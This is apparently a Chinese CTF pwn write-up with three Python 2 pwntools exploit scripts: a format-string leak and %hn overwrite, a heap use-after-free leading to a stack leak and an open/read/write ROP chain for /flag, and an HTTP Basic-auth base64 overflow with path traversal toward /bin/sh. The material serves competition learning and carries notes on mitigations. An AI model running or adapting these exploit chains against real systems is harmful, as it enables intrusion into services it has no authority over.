AK了PWN,一个2血+一个3血

PWN

fmt

格串

#!/usr/bin/python2
# Exploit script from a CTF write-up for the "fmt" challenge: attacker-controlled
# text reaches printf as the format argument.  Python 2 / pwntools, so every
# payload is a str, not bytes.
# Defender's note: -Wformat-security catches this bug class at compile time and
# _FORTIFY_SOURCE=2 aborts on %n-style writes from non-constant format strings.
from pwn import *

context.binary = 'fmt'
# challenge-provided libc; every offset used below is specific to this build
libc = ELF('libc.so.6', checksec = False)
io = remote('60.204.140.184', 30137)

# short aliases for the pwntools tube helpers
ru = lambda x : io.recvuntil(x, drop = True)
sla = lambda a, b : io.sendlineafter(a, b)
ia = lambda : io.interactive()
uu64 = lambda x : u64(x.ljust(8, '\x00'))  # unpack a short little-endian value, NUL-padded to 8 bytes
libc_os = lambda x : libc_base + x  # libc_base is assigned further down, after the leak

# Stage 1: leak.  Positional %p reads print format arguments 10 and 12,
# comma-delimited so they can be parsed back out of the reply.
pld = flat([
',%10$p'
',%12$p,\x00'
])
sla('I need a str: ', pld)
ru(',')
# the first leaked value is taken to be the address of _IO_2_1_stderr_ in libc
libc_base = int(ru(','), 16) - libc.sym['_IO_2_1_stderr_']
stack_addr = int(ru(','), 16)
# hard-coded distance from the leaked stack value to the target return address (binary-specific)
ret_addr = stack_addr + 0x22
one = libc_os(0xe3b01)  # one-gadget offset for this libc build; not portable
# Stage 2: write.  The low 32 bits of `one` are split into two 16-bit halves
# and stored with %hn through the pointers at argument slots 12 and 13; the
# second %c count is relative to the first because printf's counter accumulates.
pld = flat([
'%',
str(int(hex(one)[-8:-4], 16)),
'c',
'%12$hn',
'%',
str(int(hex(one)[-4:], 16) - int(hex(one)[-8:-4], 16)),
'c',
'%13$hn'
])
# presumably pads the format text so the two pointers below line up with argument slots 12 and 13
pld = pld.ljust(0x30, 'a')
pld += flat([
ret_addr + 2,
ret_addr
])
sla('I need other str: ', pld)
ia()

mi

UAF

#!/usr/bin/python2
# Exploit script from a CTF write-up for the "pwn" heap challenge: a menu-driven
# program with add/delete/edit/show by index, which the write-up describes as a
# use-after-free (a slot stays usable after delete).  Python 2 / pwntools.
# Defender's note: nulling the slot pointer on delete and bounds-checking idx on
# every operation removes the primitive this script relies on.
from pwn import *

io = remote('123.60.179.52', 30307)
context.binary = 'pwn'
# challenge-provided libc; the hard-coded offsets below match this build only
libc = ELF('libc.so.6', checksec = False)

# short aliases for the pwntools tube helpers
rc = lambda n : io.recv(n)
ru = lambda x : io.recvuntil(x, drop = True)
sa = lambda a, b : io.sendafter(a, b)
sla = lambda a, b : io.sendlineafter(a, b)
ia = lambda : io.interactive()
uu64 = lambda x : u64(x.ljust(8, '\x00'))  # unpack a short little-endian value, NUL-padded to 8 bytes
libc_os = lambda x : libc_base + x  # libc_base is assigned later, once leaked
libc_sym = lambda x : libc_os(libc.sym[x])  # absolute address of a libc symbol

def menu(choice):
    """Pick a menu entry: send its number as a line after the '>>' prompt."""
    io.sendlineafter('>>', str(choice))

def add(size, content):
    """Menu option 1: send `size` as a line, then `content` raw (no newline)."""
    menu(1)
    io.sendlineafter('Pls input the size:\n', str(size))
    io.sendafter('Pls input Content:\n', content)

def delete(idx):
    """Menu option 2: send the index to delete."""
    menu(2)
    io.sendlineafter('Please input the idx:\n', str(idx))

def edit(idx, content):
    """Menu option 3: send the index, then the new `content` raw (no newline)."""
    menu(3)
    io.sendlineafter('Please input the idx:\n', str(idx))
    io.sendafter('Pls input the Content:\n', content)

def show(idx):
    """Menu option 4: send the index whose content should be printed."""
    menu(4)
    io.sendlineafter('Please input the idx:\n', str(idx))

# Stage 1: heap leak.  Two 0x500-byte notes, then index 0 is deleted four
# times and re-allocated; per the write-up the slot stays usable after delete.
for i in range(2):
    add(0x500, 'a')
for i in range(4):
    delete(0)
add(0x500, 'a')
edit(0, 'aa')  # presumably clobbers only the low two bytes so show() prints the rest of the stored pointer
show(0)
leak = uu64(ru('\n'))
leak = leak >> 16 << 16  # drop the two clobbered low bytes
# both constants come from the author's debugging session; only their difference is used
leak_libc_addr = leak - (0x4297c020000 - 0x4297c000210)
edit(0, flat(leak_libc_addr))
add(0x500, 'a')
pld = flat({0x30: 'a'})  # 0x30 bytes of filler, then 'a'
add(0x500, pld)
show(4)
rc(0x30)  # skip the filler before reading the leaked value
libc_base = uu64(ru('\n')) - 0x214861  # hard-coded offset for the challenge libc
environ = libc_sym('environ')
# Stage 2: stack leak through environ.  The seven-word record written into
# note 4 is a constructed structure; 0x7f4a25193820 is a hard-coded value not
# derived from the leak (likely captured from a debug session) — verify
# against the target before reuse.
pld = flat([
1,
0x3300030002,
environ - 0x10,
0x50000000002,
0,
0,
0x7f4a25193820
])
edit(4, pld)
add(0x500, 'a' * 0x10)
show(5)
rc(0x10)  # skip the 0x10 'a' bytes before the leaked value
stack_addr = uu64(ru('\n'))
# hard-coded delta from the environ value to the targeted return address
ret_addr = stack_addr - (0x7ffde5436a68 - 0x7ffde5436948)
# Stage 3: the same record again, now pointing at the return address
pld = flat([
1,
0x3300030002,
ret_addr,
0x50000000002,
0,
0,
0x7f4a25193820
])
edit(4, pld)
# Stage 4: ROP chain open("/flag", 0) -> read(3, ret_addr + 0x100, 0x50) ->
# write(1, ...); rsi/rdx are left as set for read(), so write() reuses them.
read_addr = libc_sym('read')
write_addr = libc_sym('write')
open_addr = libc_sym('open')
# gadget offsets for this libc build
pop_rdi = libc_os(0x0000000000023b6a)
pop_rsi = libc_os(0x000000000002601f)
pop_rdx = libc_os(0x0000000000142c92)
flag_addr = ret_addr + 0x78  # 15 chain entries * 8 bytes -> the '/flag' string appended below
rop_chain = flat([
pop_rdi,
flag_addr,
pop_rsi,
0,
open_addr,
pop_rdi,
3,
pop_rsi,
ret_addr + 0x100,
pop_rdx,
0x50,
read_addr,
pop_rdi,
1,
write_addr
])
rop_chain += '/flag\x00'
add(0x500, rop_chain)
ia()

ezhttp

base64解码函数存在数组溢出

#!/usr/bin/python2
# Exploit script from a CTF write-up for the "ezhttp" challenge.  The write-up
# states that the server's base64 decoder overflows an array; the payload is
# carried in the HTTP Basic Authorization header.  Python 2 / pwntools.
# Defender's note: bounding the decoder's output to the destination buffer
# size and canonicalising request paths before use close both issues here.
from pwn import *
from base64 import b64encode

r = remote('123.60.179.52', 30266)
# 0x40 NUL bytes, then a traversal path ending in "?.html" (flat() with a dict places the string at offset 0x40)
key = flat({0x40: '/../../../../bin/sh?.html'}, filler = '\x00')
# minimal request with bare "\n" line endings; the trailing "\n" plus the
# newline sendline() appends form the blank line that ends the header block
pld = '''GET /index.html
Authorization: Basic '''
pld += b64encode(key) + '\n'
r.sendline(pld)
r.interactive()